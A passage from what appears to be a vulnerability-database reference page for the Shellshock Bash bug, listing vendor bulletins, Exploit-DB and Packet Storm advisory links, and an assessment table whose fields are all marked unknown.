HPSBST03265 (http://marc.info/?l=bugtraq&m=142546741516006&w=2)
HPSBGN03142 (http://marc.info/?l=bugtraq&m=141383244821813&w=2)
HPSBMU03133 (http://marc.info/?l=bugtraq&m=141330425327438&w=2)
HPSBST03181 (http://marc.info/?l=bugtraq&m=141577241923505&w=2)
EXPLOIT-DB-40938 (https://www.exploit-db.com/exploits/40938/)
HPSBGN03117 (http://marc.info/?l=bugtraq&m=141216207813411&w=2)
HPSBHF03145 (http://marc.info/?l=bugtraq&m=141383465822787&w=2)
HPSBST03148 (http://marc.info/?l=bugtraq&m=141694386919794&w=2)
HPSBGN03138 (http://marc.info/?l=bugtraq&m=141330468527613&w=2)
HPSBHF03124 (http://marc.info/?l=bugtraq&m=141235957116749&w=2)
HPSBHF03125 (http://marc.info/?l=bugtraq&m=141345648114150&w=2)
HPSBHF03146 (http://marc.info/?l=bugtraq&m=141383353622268&w=2)
HPSBGN03141 (http://marc.info/?l=bugtraq&m=141383304022067&w=2)
EXPLOIT-DB-42938 (https://www.exploit-db.com/exploits/42938/)
Miscellaneous
http://packetstormsecurity.com/files/128517/VMware-Security-Advisory-2014-0010.html
http://packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.html
http://packetstormsecurity.com/files/128567/CA-Technologies-GNU-Bash-Shellshock.html
http://packetstormsecurity.com/files/128573/Apache-mod_cgi-Remote-Command-Execution.html
http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
http://packetstormsecurity.com/files/161107/SonicWall-SSL-VPN-Shellshock-Remote-Code-Execution.html
https://www.arista.com/en/support/advisories-notices/security-advisories/1008-security-advisory-0006

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis